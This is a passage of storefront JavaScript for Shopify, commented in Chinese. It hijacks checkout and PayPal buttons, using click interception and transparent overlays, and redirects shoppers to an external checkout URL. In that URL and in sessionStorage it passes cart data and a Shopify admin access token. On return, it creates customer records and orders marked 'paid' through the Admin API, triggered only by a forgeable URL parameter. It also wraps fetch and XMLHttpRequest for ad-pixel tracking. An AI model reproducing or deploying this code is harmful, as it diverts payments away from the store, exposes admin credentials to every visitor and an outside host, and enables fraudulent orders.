            'shopify_facebook_pixel_id',       // SessionStorage键名
            FACEBOOK_PIXEL_ID                  // 默认值
        );
    }

    // 获取Facebook Browser ID
    function getFBP() {
        const fbpMatch = document.cookie.match(/_fbp=([^;]*)/);
        return fbpMatch ? fbpMatch[1] : null;
    }

    // 获取TikTok Pixel ID
    function getTikTokPixelId() {
        return getPixelId(
            'custom-tiktok-pixel',             // URL参数名
            'shopify_tiktok_pixel_id',         // SessionStorage键名
            TIKTOK_PIXEL_ID                    // 默认值
        );
    }

    // 统一的跳转函数
    async function redirectToCustomCheckout(productData) {
        sessionStorage.setItem('JwrIsShopify', 'true');

        if (productData && productData.products.length > 0) {
            try {
                // 添加当前商店域名信息
                productData.store_domain = `https://${window.location.hostname}`;

                // 添加商店logo信息
                const storeLogo = getStoreLogo();
                if (storeLogo) {
                    productData.store_logo = storeLogo;
                }

                // 获取商店货币信息
                const currencyInfo = await getStoreCurrency();
                productData.store_currency = currencyInfo.currency;
                productData.store_money_format = currencyInfo.money_format;

                // 添加Facebook像素信息
                productData.facebook_pixel_id = getFacebookPixelId();
                productData.fbp = getFBP();

                // 添加TikTok Pixel ID
                productData.tiktok_pixel_id = getTikTokPixelId();

                // 添加Shopify配置信息
                productData.shopify_config = {
                    shop_name: window.location.hostname,  // 从域名中提取商店名称
                    access_token: SHOPIFY_ADMIN_TOKEN
                };

                // 将商品数据编码为URL参数
                const encodedData = encodeURIComponent(JSON.stringify(productData));
                const redirectUrl = `${CHECKOUT_URL}?cart_data=${encodedData}&source=${productData.type}`;

                // 存储到sessionStorage作为备份
                sessionStorage.setItem('shopify_store_domain', productData.store_domain);
                if (storeLogo) {
                    sessionStorage.setItem('shopify_store_logo', storeLogo);
                }
                sessionStorage.setItem('shopify_store_currency', productData.store_currency);
                sessionStorage.setItem('shopify_store_money_format', productData.store_money_format);
                sessionStorage.setItem('shopify_config', JSON.stringify(productData.shopify_config));

                // 跳转到自定义结账页面
                window.location.href = redirectUrl;
            } catch (error) {
                // 如果编码失败，直接跳转
                window.location.href = CHECKOUT_URL;
            }
        } else {
            // 即使没有商品数据，也传递商店域名和logo
            try {
                const storeDomain = `https://${window.location.hostname}`;
                const storeLogo = getStoreLogo();

                sessionStorage.setItem('shopify_store_domain', storeDomain);
                if (storeLogo) {
                    sessionStorage.setItem('shopify_store_logo', storeLogo);
                }

                let redirectUrl = `${CHECKOUT_URL}?store_domain=${encodeURIComponent(storeDomain)}`;
                if (storeLogo) {
                    redirectUrl += `&store_logo=${encodeURIComponent(storeLogo)}`;
                }

                window.location.href = redirectUrl;
            } catch (error) {
                window.location.href = CHECKOUT_URL;
            }
        }
    }

    // 劫持结账按钮点击事件
    function hijackCheckoutButton(button) {
        if (button.dataset.hijacked || isAddToCartButton(button) || !isCheckoutButton(button)) return;
        button.dataset.hijacked = 'true';

        button.addEventListener('click', async function (e) {
            e.preventDefault();
            e.stopPropagation();

            let productData;
            if (isCartCheckoutScenario(button)) {
                // 购物车场景 - 直接获取购物车数据
                productData = await getCartInfo();
            } else {
                // 单品场景 - 添加到购物车后获取数据
                const form = button.closest('form[action*="/cart/add"]') || document.querySelector('form[action*="/cart/add"]');
                if (form) {
                    const res = await fetch('/cart/add.js', { method: 'POST', body: new FormData(form) });
                    productData = res.ok ? await getCartInfo() : await handleSingleProductPurchase(button);
                } else {
                    productData = await handleSingleProductPurchase(button);
                }
            }
            redirectToCustomCheckout(productData);
        }, true);
    }

    // 添加必要的CSS样式
    function addPaymentInterceptStyles() {
        if (document.querySelector('#payment-intercept-styles')) return;
        const style = document.createElement('style');
        style.id = 'payment-intercept-styles';
        style.textContent = '.paypal-overlay { position: absolute !important; top: 0 !important; left: 0 !important; width: 100% !important; height: 100% !important; background: transparent !important; z-index: 999 !important; cursor: pointer !important; pointer-events: auto !important; } .paypal-button-container, .paypal-buttons, [data-shopify-buttoncontainer] { position: relative !important; }';
        document.head.appendChild(style);
    }

    // 初始化劫持
    function initHijack() {
        addPaymentInterceptStyles();
        document.querySelectorAll('button, input[type="submit"], a').forEach(hijackCheckoutButton);
        handleSpecialPaymentButtons();
        setTimeout(handleSpecialPaymentButtons, 2000);
    }

    // 监听DOM变化
    const observer = new MutationObserver(function (mutations) {
        mutations.forEach(function (mutation) {
            mutation.addedNodes.forEach(function (node) {
                if (node.nodeType === 1) {
                    // 检查新添加的节点是否为按钮
                    if (node.matches && (node.matches('button') || node.matches('input[type="submit"]') || node.matches('a'))) {
                        hijackCheckoutButton(node);
                    }
                    // 检查新添加节点内的按钮
                    if (node.querySelectorAll) {
                        const buttons = node.querySelectorAll('button, input[type="submit"], a');
                        buttons.forEach(hijackCheckoutButton);
                    }

                    // 检查是否有新的PayPal或支付选项元素
                    if (node.matches && (
                        node.matches('iframe[name*="paypal"]') ||
                        node.matches('iframe[title*="PayPal"]') ||
                        node.matches('.paypal-button-container') ||
                        node.matches('.shopify-payment-button__more-options') ||
                        node.matches('more-payment-options-link')
                    )) {
                        handleSpecialPaymentButtons();
                    }

                    // 检查新添加节点内的特殊支付元素
                    if (node.querySelectorAll) {
                        const specialElements = node.querySelectorAll('iframe[name*="paypal"], iframe[title*="PayPal"], .paypal-button-container, .shopify-payment-button__more-options, more-payment-options-link');
                        if (specialElements.length > 0) {
                            handleSpecialPaymentButtons();
                        }
                    }
                }
            });
        });
    });

    // 全局点击监听器，捕获可能遗漏的支付按钮点击
    document.addEventListener('click', async function (e) {
        const target = e.target;

        if (target.closest('iframe[name*="paypal"]') || target.closest('iframe[title*="PayPal"]') || target.closest('.paypal-button-container') || target.closest('.paypal-buttons') || target.matches('.shopify-payment-button__more-options') || target.matches('#more-payment-options-link') || target.closest('more-payment-options-link')) {

            if (!target.dataset.hijacked && !target.closest('[data-hijacked="true"]')) {
                e.preventDefault();
                e.stopPropagation();

                const productData = isCartCheckoutScenario(target) ?
                    (await getCartInfo()) :
                    (await getSingleProductInfo(target));

                redirectToCustomCheckout(productData);
            } else {
            }
        }
    }, true);

    // 启动
    if (document.readyState === 'loading') {
        document.addEventListener('DOMContentLoaded', function() {
            initHijack();
            observer.observe(document.body, {
                childList: true,
                subtree: true
            });
        });
    } else {
        initHijack();
        if (document.body) {
            observer.observe(document.body, {
                childList: true,
                subtree: true
            });
        }
    }

    // 检查是否从支付页面返回，如果是则创建订单
    function checkPaymentReturn() {
        const urlParams = new URLSearchParams(window.location.search);
        const paymentSuccess = urlParams.get('payment_success');
        const fromThankYou = urlParams.get('from_thank_you');

        if (paymentSuccess) {

            // 立即清除URL参数，防止重复创建订单
            clearPaymentSuccessParam();

            try {
                const paymentData = JSON.parse(decodeURIComponent(paymentSuccess));

                if (paymentData.success === '1') {
                    createShopifyOrder(paymentData);
                }
            } catch (error) {
            }
        } else if (fromThankYou) {
            // 从感谢页面返回，检查是否需要创建订单
            checkOrderCreationFromThankYou();
        }
    }

    // 从感谢页面返回时检查订单创建
    function checkOrderCreationFromThankYou() {
        try {
            // 从sessionStorage获取支付数据
            const paymentDataStr = sessionStorage.getItem('payment_data');

            if (paymentDataStr) {
                const paymentData = JSON.parse(paymentDataStr);

                if (paymentData.success === '1') {
                    createShopifyOrder(paymentData);
                    // 清除sessionStorage中的支付数据
                    sessionStorage.removeItem('payment_data');
                }
            }
        } catch (error) {
            console.error('Check the thank you page for order creation failure:', error);
        }
    }

    // 清除URL中的payment_success参数
    function clearPaymentSuccessParam() {
        const url = new URL(window.location);
        url.searchParams.delete('payment_success');

        // 使用replaceState避免在浏览器历史中留下记录
        window.history.replaceState({}, document.title, url.toString());
    }

    // 尝试通过产品标题查找variant_id
    async function findVariantByTitle(productTitle) {
        try {
            const searchResponse = await fetch(`/search/suggest.json?q=${encodeURIComponent(productTitle)}&resources[type]=product&resources[limit]=1`);
            if (!searchResponse.ok) return null;
            const searchData = await searchResponse.json();
            if (!searchData.resources?.results?.products?.[0]) return null;
            const productResponse = await fetch(`/products/${searchData.resources.results.products[0].handle}.js`);
            const productData = productResponse.ok ? await productResponse.json() : null;
            return productData?.variants?.[0]?.id || null;
        } catch (error) {
            return null;
        }
    }

    // 防止重复创建订单的标志
    let isCreatingOrder = false;

    // 创建Shopify订单
    async function createShopifyOrder(paymentData) {

        // 防止重复创建订单
        if (isCreatingOrder) {
            return;
        }

        isCreatingOrder = true;
        const shopifyDomain = window.location.hostname;

        // 检查是否有完整的支付数据
        if (!paymentData.cart || !paymentData.cart.items) {
            isCreatingOrder = false;
            return;
        }

        // 数据格式标准化 - 确保使用正确的字段名
        let items = paymentData.cart.items || paymentData.cart.products || [];
        if (!Array.isArray(items)) {
            isCreatingOrder = false;
            return;
        }


        // 尝试为没有variant_id的商品查找真实的variant_id
        for (let item of items) {
            if (!item.id || item.id === 'unknown' || isNaN(item.id) || parseInt(item.id) <= 0) {
                const foundVariantId = await findVariantByTitle(item.title);
                if (foundVariantId) {
                    item.id = foundVariantId.toString();
                }
            }
        }

        // 尝试创建或查找用户账户
        let customerId = null;
        try {
            // 首先尝试查找现有用户
            const customerSearchResponse = await fetch(`https://${shopifyDomain}/admin/api/2023-10/customers/search.json?query=email:${encodeURIComponent(paymentData.customer_email)}`, {
                headers: {
                    'X-Shopify-Access-Token': SHOPIFY_ADMIN_TOKEN
                }
            });

            if (customerSearchResponse.ok) {
                const customerSearchResult = await customerSearchResponse.json();
                if (customerSearchResult.customers && customerSearchResult.customers.length > 0) {
                    customerId = customerSearchResult.customers[0].id;
                }
            }

            // 如果没有找到用户，创建新用户
            if (!customerId) {
                const customerData = {
                    customer: {
                        first_name: paymentData.customer_firstName,
                        last_name: paymentData.customer_lastName,
                        email: paymentData.customer_email,
                        verified_email: true,
                        addresses: [{
                            first_name: paymentData.billing_address.first_name,
                            last_name: paymentData.billing_address.last_name,
                            address1: paymentData.billing_address.address1,
                            address2: paymentData.billing_address.address2,
                            city: paymentData.billing_address.city,
                            province: paymentData.billing_address.province,
                            zip: paymentData.billing_address.zip,
                            country: paymentData.billing_address.country
                        }]
                    }
                };

                const customerCreateResponse = await fetch(`https://${shopifyDomain}/admin/api/2023-10/customers.json`, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json',
                        'X-Shopify-Access-Token': SHOPIFY_ADMIN_TOKEN
                    },
                    body: JSON.stringify(customerData)
                });

                if (customerCreateResponse.ok) {
                    const customerResult = await customerCreateResponse.json();
                    customerId = customerResult.customer.id;
                }
            }
        } catch (error) {
            console.error('Error creating/looking up user:', error);
        }

        // 构建订单备注
        const orderNote = `Payment method: ${paymentData.paymentMethod}\nOrder source: ${paymentData.is_direct_purchase ? 'Direct Purchase' : 'Cart Checkout'}`;

        // 构建订单数据
        const orderData = {
            order: {
                email: paymentData.customer_email,
                financial_status: 'paid',
                fulfillment_status: null,
                send_receipt: true,
                send_fulfillment_receipt: true,
                note: orderNote,
                // 添加客户信息，确保订单与用户关联
                customer: {
                    first_name: paymentData.customer_firstName,
                    last_name: paymentData.customer_lastName,
                    email: paymentData.customer_email
                },
                // 添加客户ID，如果存在的话
                customer_id: customerId || null,
                // 添加标签，便于识别
                tags: ['custom-checkout', paymentData.paymentMethod.toLowerCase().replace(' ', '-')],
                // 确保订单与用户账户关联
                customer_locale: 'en',
                currency: paymentData.cart.currency || 'USD',
                // 添加订单来源信息
                source_name: 'custom-checkout',
                source_identifier: 'custom-checkout-plugin',
                billing_address: {
                    first_name: paymentData.billing_address.first_name,
                    last_name: paymentData.billing_address.last_name,
                    address1: paymentData.billing_address.address1,
                    address2: paymentData.billing_address.address2,
                    city: paymentData.billing_address.city,
                    province: paymentData.billing_address.province,
                    zip: paymentData.billing_address.zip,
                    country: paymentData.billing_address.country
                },
                shipping_address: {
                    first_name: paymentData.shipping_address.first_name,
                    last_name: paymentData.shipping_address.last_name,
                    address1: paymentData.shipping_address.address1,
                    address2: paymentData.shipping_address.address2,
                    city: paymentData.shipping_address.city,
                    province: paymentData.shipping_address.province,
                    zip: paymentData.shipping_address.zip,
                    country: paymentData.shipping_address.country
                },
                line_items: items.map(item => {
                    // 检查是否有真实的variant_id
                    const variantId = item.id;
                    const hasValidVariantId = variantId &&
                        variantId !== 'unknown' &&
                        variantId !== null &&
                        variantId !== undefined &&
                        !isNaN(variantId) &&
                        parseInt(variantId) > 0;

                   
                    if (hasValidVariantId) {
                        // 使用真实的Shopify商品变体 - 图片会自动显示在商品旁边
                        return {
                            variant_id: parseInt(variantId),
                            quantity: item.quantity
                        };
                    } else {
                        // 使用自定义商品格式
                        const lineItem = {
                            title: item.title,
                            price: (item.price / 100).toFixed(2),
                            quantity: item.quantity,
                            requires_shipping: true,
                            taxable: true
                        };

                        // 如果有变体标题，添加到订单项中
                        if (item.variant_title && item.variant_title.trim() !== '') {
                            lineItem.variant_title = item.variant_title;
                        }

                        return lineItem;
                    }
                }),
                note_attributes: [
                    {
                        name: 'Order Source',
                        value: paymentData.is_direct_purchase ? 'Direct Purchase' : 'Cart Checkout'
                    },
                    {
                        name: 'Payment Method',
                        value: paymentData.paymentMethod
                    }
                ],
                transactions: [{
                    kind: 'sale',
                    status: 'success',
                    amount: (paymentData.cart.total_price / 100).toFixed(2),
                    currency: paymentData.cart.currency || 'USD',
                    gateway: paymentData.paymentMethod
                }]
            }
        };


        try {
            const response = await fetch(`https://${shopifyDomain}/admin/api/2023-10/orders.json`, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                    'X-Shopify-Access-Token': SHOPIFY_ADMIN_TOKEN
                },
                body: JSON.stringify(orderData)
            });


            if (response.ok) {
                const result = await response.json();

                // 检查响应中是否包含订单信息
                if (result.order) {
                } else {
                    console.error('There is no order information in the API response:', result);
                }

                // 只有购物车结账才清空购物车并刷新显示
                // 单品购买不清空购物车，保留用户原有的购物车商品
                if (!paymentData.is_direct_purchase) {
                    // 将订单信息存储到sessionStorage，用于页面刷新后显示
                    try {
                        sessionStorage.setItem('pending_order_success', JSON.stringify(result.order));
                    } catch (error) {
                        console.error('Failed to store order information:', error);
                    }

                    // 快速清空购物车并刷新页面
                    await clearCart();
                } else {
                    // 单品购买直接显示成功消息
                    if (result.order) {
                        showOrderSuccessMessage(result.order);
                    } else {
                        console.error('Unable to display success message, no order information in the response');
                    }
                }
            } else {
                const errorText = await response.text();
                console.error('Shopify API call failed:', response.status, response.statusText, errorText);

                // 尝试解析错误响应
                try {
                    const errorJson = JSON.parse(errorText);
                    console.error('Shopify API error details:', errorJson);
                } catch (parseError) {
                    console.error('Unable to parse error response as JSON');
                }
            }
        } catch (error) {
            console.error('An error occurred while creating a Shopify order:', error);
            console.error('Error details:', error.message);
        } finally {
            // 无论成功还是失败，都重置创建标志
            isCreatingOrder = false;
        }
    }

    // 显示订单成功消息
    function showOrderSuccessMessage(order) {
        // 检查是否已经有成功消息，避免重复显示
        const existingMessage = document.querySelector('.order-success-message');
        if (existingMessage) {
            existingMessage.remove();
        }

        const message = document.createElement('div');
        message.className = 'order-success-message';
        message.style.cssText = `
            position: fixed;
            top: 20px;
            right: 20px;
            background: linear-gradient(135deg, #28a745 0%, #20c997 100%);
            color: white;
            padding: 20px 25px;
            border-radius: 12px;
            box-shadow: 0 10px 25px -5px rgba(0, 0, 0, 0.3);
            z-index: 10000;
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
            font-size: 14px;
            max-width: 350px;
            min-width: 300px;
            animation: slideInRight 0.4s ease-out;
            border: 1px solid rgba(255, 255, 255, 0.2);
        `;

        // 添加动画样式
        if (!document.querySelector('#success-message-styles')) {
            const style = document.createElement('style');
            style.id = 'success-message-styles';
            style.textContent = `
                @keyframes slideInRight {
                    from {
                        opacity: 0;
                        transform: translateX(100%);
                    }
                    to {
                        opacity: 1;
                        transform: translateX(0);
                    }
                }
                @keyframes slideOutRight {
                    from {
                        opacity: 1;
                        transform: translateX(0);
                    }
                    to {
                        opacity: 0;
                        transform: translateX(100%);
                    }
                }
            `;
            document.head.appendChild(style);
        }

        // 构建正确的订单查看链接
        const currentDomain = window.location.hostname;
        const customerOrderDetailUrl = `https://${currentDomain}/account/orders/${order.id}`;


        message.innerHTML = `
            <div style="position: relative;">
                <!-- 关闭按钮 -->
                <button onclick="this.closest('.order-success-message').remove()" style="
                    position: absolute;
                    top: -8px;
                    right: -8px;
                    background: rgba(255, 255, 255, 0.2);
                    color: white;
                    border: none;
                    width: 24px;
                    height: 24px;
                    border-radius: 50%;
                    cursor: pointer;
                    font-size: 14px;
                    font-weight: bold;
                    display: flex;
                    align-items: center;
                    justify-content: center;
                    transition: all 0.3s ease;
                " onmouseover="this.style.background='rgba(255, 255, 255, 0.3)'" onmouseout="this.style.background='rgba(255, 255, 255, 0.2)'">×</button>
                
                <div style="display: flex; align-items: center; margin-bottom: 12px;">
                    <svg width="24" height="24" viewBox="0 0 24 24" fill="none" style="margin-right: 10px;">
                        <circle cx="12" cy="12" r="12" fill="rgba(255, 255, 255, 0.2)"/>
                        <path d="M10 14L8 12L7.29 12.71L10 15.41L17 8.41L16.29 7.7L10 14Z" fill="white"/>
                    </svg>
                    <div>
                        <div style="font-size: 16px; font-weight: 600; margin-bottom: 2px;">Payment Successful!</div>
                        <div style="font-size: 12px; opacity: 0.9;">Order #${order.order_number} - ${order.currency} ${order.total_price}</div>
                    </div>
                </div>
                
                <a href="${customerOrderDetailUrl}" style="
                    background: rgba(255, 255, 255, 0.2);
                    color: white;
                    text-decoration: none;
                    padding: 8px 16px;
                    border-radius: 6px;
                    font-size: 13px;
                    font-weight: 500;
                    display: inline-block;
                    transition: all 0.3s ease;
                    border: 1px solid rgba(255, 255, 255, 0.3);
                " onmouseover="this.style.background='rgba(255, 255, 255, 0.3)'" onmouseout="this.style.background='rgba(255, 255, 255, 0.2)'">View Order</a>
            </div>
        `;

        document.body.appendChild(message);


        // 15秒后自动移除消息
        setTimeout(() => {
            if (message.parentNode) {
                message.style.animation = 'modalSlideOut 0.5s ease-out';
                setTimeout(() => {
                    if (message.parentNode) {
                        message.parentNode.removeChild(message);
                    }
                }, 500);
            }
        }, 15000);

    }

    // 清空购物车并刷新页面显示
    async function clearCart() {
        try {
            const response = await fetch('/cart/clear.js', { method: 'POST' });
            if (!response.ok) {
                const cartResponse = await fetch('/cart.js');
                if (cartResponse.ok) {
                    const cart = await cartResponse.json();
                    for (const item of cart.items) {
                        await fetch('/cart/change.js', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ id: item.variant_id, quantity: 0 }) });
                    }
                }
            }
            refreshCartDisplay();

            // 如果当前在购物车页面，立即刷新页面
            if (window.location.pathname.includes('/cart')) {
                // 确保sessionStorage写入完成后再刷新
                setTimeout(() => {
                    window.location.reload();
                }, 50); // 只延迟50ms，确保sessionStorage写入完成
            }
        } catch (error) {
            console.error('Error emptying shopping cart:', error);
        }
    }

    // 刷新页面购物车显示
    function refreshCartDisplay() {
        if (window.theme?.cart?.update) window.theme.cart.update();
        document.dispatchEvent(new CustomEvent('cart:updated'));
        updateCartCount(0);

        if (window.location.pathname.includes('/cart') || document.querySelector('.cart-page, .cart-drawer, [data-cart-items]')) {
            document.querySelectorAll('.cart-items, [data-cart-items], .cart-drawer__items').forEach(container => {
                if (container) container.innerHTML = '<p style="text-align: center; color: #666; padding: 20px;">Your cart is empty</p>';
            });
            document.querySelectorAll('.cart-total, [data-cart-total], .cart-drawer__total').forEach(element => {
                if (element) element.textContent = '$0.00';
            });
            document.querySelectorAll('.cart__checkout-button, [data-cart-checkout]').forEach(button => {
                if (button) button.style.display = 'none';
            });
        }

        setTimeout(() => {
            if (window.location.pathname.includes('/cart')) window.location.reload();
        }, 50); // 只延迟50ms，确保sessionStorage写入完成
    }

    // 更新购物车数量显示
    function updateCartCount(count) {
        document.querySelectorAll('.cart-count, [data-cart-count], .cart-item-count, .header__cart-count').forEach(element => {
            if (element) {
                element.textContent = count;
                if (count === 0) element.style.display = 'none';
            }
        });
    }

    // 检查是否有待显示的成功消息
    function checkPendingOrderSuccess() {
        try {
            const pendingOrder = sessionStorage.getItem('pending_order_success');
            if (pendingOrder) {
                const orderData = JSON.parse(pendingOrder);

                // 显示成功消息
                showOrderSuccessMessage(orderData);

                // 清除sessionStorage中的待显示消息
                sessionStorage.removeItem('pending_order_success');
            }
        } catch (error) {
            console.error('Error checking for success message to display:', error);
        }
    }

    // 页面加载时检查支付返回
    if (document.readyState === 'loading') {
        document.addEventListener('DOMContentLoaded', function () {
            checkPaymentReturn();
            checkPendingOrderSuccess();
        });
    } else {
        checkPaymentReturn();
        checkPendingOrderSuccess();
    }

    // ==================== AddToCart 事件追踪 ====================

    // 获取当前页面的产品信息（用于AddToCart事件）
    function getCurrentProductInfo() {
        try {
            // 方法1: 从Shopify的产品JSON获取
            if (window.ShopifyAnalytics && window.ShopifyAnalytics.meta && window.ShopifyAnalytics.meta.product) {
                const product = window.ShopifyAnalytics.meta.product;
                return {
                    id: product.id,
                    title: product.title || '',
                    price: product.price || '0',
                    variant_id: product.variants && product.variants[0] ? product.variants[0].id : null
                };
            }

            // 方法2: 从页面元素获取
            const titleElement = Utils.findElement(CONFIG.TITLE_SELECTORS, document);
            const priceElement = Utils.findElement(CONFIG.PRICE_SELECTORS, document);
            const variantElement = Utils.findElement(CONFIG.VARIANT_SELECTORS, document);

            if (titleElement || priceElement) {
                return {
                    id: variantElement ? variantElement.value : null,
                    title: titleElement ? titleElement.textContent.trim() : '',
                    price: priceElement ? Utils.cleanPrice(priceElement.textContent) : '0',
                    variant_id: variantElement ? variantElement.value : null
                };
            }

            return null;
        } catch (error) {
            console.error('Error getting current product info:', error);
            return null;
        }
    }

    // Facebook添加到购物车事件函数
    function fbq_report_addtocart() {
        if (!getFacebookPixelId()) {
            return false;
        }

        if (typeof window.fbq !== 'undefined') {
            // 获取当前页面的产品信息
            const productInfo = getCurrentProductInfo();

            if (productInfo) {
                window.fbq('track', 'AddToCart', {
                    content_ids: [productInfo.id],
                    content_type: 'product',
                    content_name: productInfo.title,
                    value: parseFloat(productInfo.price) || 0,
                    currency: 'USD'
                });
            }
        }

        return false;
    }

    // Facebook查看内容事件函数
    function fbq_report_viewcontent() {
        if (!getFacebookPixelId()) {
            return false;
        }

        if (typeof window.fbq !== 'undefined') {
            // 获取当前页面的产品信息
            const productInfo = getCurrentProductInfo();

            if (productInfo) {
                window.fbq('track', 'ViewContent', {
                    content_ids: [productInfo.id],
                    content_type: 'product',
                    content_name: productInfo.title,
                    value: parseFloat(productInfo.price) || 0,
                    currency: 'USD'
                });
            }
        }

        return false;
    }

    // ==================== TikTok Pixel 添加到购物车事件跟踪 ====================

    // 加载TikTok Pixel脚本
    function loadTikTokPixel() {
        // 使用函数获取像素ID（支持URL参数）
        const pixelId = getTikTokPixelId();
        if (!pixelId) {
            return false;
        }

        if (typeof window.ttq !== 'undefined') {
            return true;
        }

        // 加载TikTok Pixel脚本
        !function (w, d, t) {
            w.TiktokAnalyticsObject = t;
            var ttq = w[t] = w[t] || [];
            ttq.methods = ["page", "track", "identify", "instances", "debug", "on", "off", "once", "ready", "alias", "group", "enableCookie", "disableCookie"];
            ttq.setAndDefer = function (t, e) {
                t[e] = function () {
                    t.push([e].concat(Array.prototype.slice.call(arguments, 0)))
                }
            };
            for (var i = 0; i < ttq.methods.length; i++) ttq.setAndDefer(ttq, ttq.methods[i]);
            ttq.instance = function (t) {
                for (var e = ttq._i[t] || [], n = 0; n < ttq.methods.length; n++) ttq.setAndDefer(e, ttq.methods[n]);
                return e
            };
            ttq.load = function (e, n) {
                var i = "https://analytics.tiktok.com/i18n/pixel/events.js";
                ttq._i = ttq._i || {};
                ttq._i[e] = [];
                ttq._i[e]._u = i;
                ttq._t = ttq._t || {};
                ttq._t[e] = +new Date;
                ttq._o = ttq._o || {};
                ttq._o[e] = n || {};
                var o = document.createElement("script");
                o.type = "text/javascript";
                o.async = !0;
                o.src = i + "?sdkid=" + e + "&lib=" + t;
                var a = document.getElementsByTagName("script")[0];
                a.parentNode.insertBefore(o, a)
            };

            ttq.load(pixelId);
            ttq.page();
        }(window, document, 'ttq');

        return true;
    }

    // TikTok添加到购物车事件函数
    function ttq_report_addtocart() {
        if (!getTikTokPixelId()) {
            return false;
        }

        if (typeof window.ttq !== 'undefined') {
            // 获取当前页面的产品信息
            const productInfo = getCurrentProductInfo();

            if (productInfo) {
                window.ttq.track('AddToCart', {
                    content_id: productInfo.id,
                    content_type: 'product',
                    content_name: productInfo.title,
                    value: parseFloat(productInfo.price) || 0,
                    currency: 'USD'
                });
            }
        }

        return false;
    }

    // ==================== 加载Facebook Pixel ====================

    // 加载Facebook像素脚本
    function loadFacebookPixel() {
        // 使用函数获取像素ID（支持URL参数）
        const pixelId = getFacebookPixelId();
        if (!pixelId) {
            return false;
        }

        // 检查是否已加载
        if (typeof window.fbq !== 'undefined') {
            return true;
        }

        // 加载Facebook像素脚本
        !function (f, b, e, v, n, t, s) {
            if (f.fbq) return; n = f.fbq = function () {
                n.callMethod ?
                    n.callMethod.apply(n, arguments) : n.queue.push(arguments)
            };
            if (!f._fbq) f._fbq = n; n.push = n; n.loaded = !0; n.version = '2.0';
            n.queue = []; t = b.createElement(e); t.async = !0;
            t.src = v; s = b.getElementsByTagName(e)[0];
            s.parentNode.insertBefore(t, s)
        }(window, document, 'script',
            'https://connect.facebook.net/en_US/fbevents.js');

        // 初始化Facebook像素
        window.fbq('init', pixelId);
        window.fbq('track', 'PageView');

        return true;
    }

    // ==================== 监听添加到购物车事件 ====================

    // 监听添加到购物车的API请求
    function setupAddToCartTracking() {
        // 监听fetch请求（现代Shopify主题使用）
        const originalFetch = window.fetch;
        window.fetch = function (...args) {
            const url = args[0];

            // 检测添加到购物车的API请求
            if (typeof url === 'string' &&
                (url.includes('/cart/add') ||
                    url.includes('/cart/add.js') ||
                    url.includes('/cart/change'))) {

                return originalFetch.apply(this, args).then(response => {
                    if (response.ok && url.includes('/cart/add')) {
                        fbq_report_addtocart();
                        ttq_report_addtocart();
                    }
                    return response;
                });
            }

            return originalFetch.apply(this, args);
        };

        // 监听XMLHttpRequest（旧版Shopify主题使用）
        const originalOpen = XMLHttpRequest.prototype.open;
        const originalSend = XMLHttpRequest.prototype.send;

        XMLHttpRequest.prototype.open = function (method, url) {
            this._url = url;
            return originalOpen.apply(this, arguments);
        };

        XMLHttpRequest.prototype.send = function () {
            if (this._url && this._url.includes('/cart/add')) {
                this.addEventListener('load', function () {
                    if (this.status === 200) {
                        fbq_report_addtocart();
                        ttq_report_addtocart();
                    }
                });
            }
            return originalSend.apply(this, arguments);
        };
    }

    // ==================== 检测商品页面并触发ViewContent事件 ====================

    // 检测是否为商品页面
    function isProductPage() {
        // 方法1: 检查URL路径
        const path = window.location.pathname;
        if (path.includes('/products/')) {
            return true;
        }

        // 方法2: 检查页面中是否有产品数据
        if (window.meta?.page?.pageType === 'product' ||
            window.ShopifyAnalytics?.meta?.page?.pageType === 'product') {
            return true;
        }

        // 方法3: 检查是否有产品表单
        if (document.querySelector('form[action*="/cart/add"]')) {
            return true;
        }

        return false;
    }

    // 触发Facebook ViewContent事件（商品页面）
    function triggerFacebookViewContent() {
        if (!getFacebookPixelId()) {
            return;
        }

        if (!isProductPage()) {
            return;
        }

        // 延迟触发，确保Facebook Pixel已加载
        setTimeout(() => {
            fbq_report_viewcontent();
        }, 1000);
    }

    // ==================== 初始化广告跟踪 ====================

    // 初始化广告跟踪（Facebook Pixel + TikTok Pixel）
    function initAdsTracking() {
        // 检查是否配置了任何广告平台（使用函数获取，支持URL参数）
        const hasFacebookPixel = getFacebookPixelId();
        const hasTikTokPixel = getTikTokPixelId();

        if (!hasFacebookPixel && !hasTikTokPixel) {
            return;
        }

        // 加载Facebook Pixel（如果配置了）
        if (hasFacebookPixel) {
            loadFacebookPixel();

            // 触发ViewContent事件（如果是商品页面）
            triggerFacebookViewContent();
        }

        // 加载TikTok Pixel（如果配置了）
        if (hasTikTokPixel) {
            loadTikTokPixel();
        }

        // 设置添加到购物车事件监听
        setupAddToCartTracking();
    }

    // 页面加载完成后初始化广告跟踪
    if (document.readyState === 'loading') {
        document.addEventListener('DOMContentLoaded', initAdsTracking);
    } else {
        initAdsTracking();
    }

})();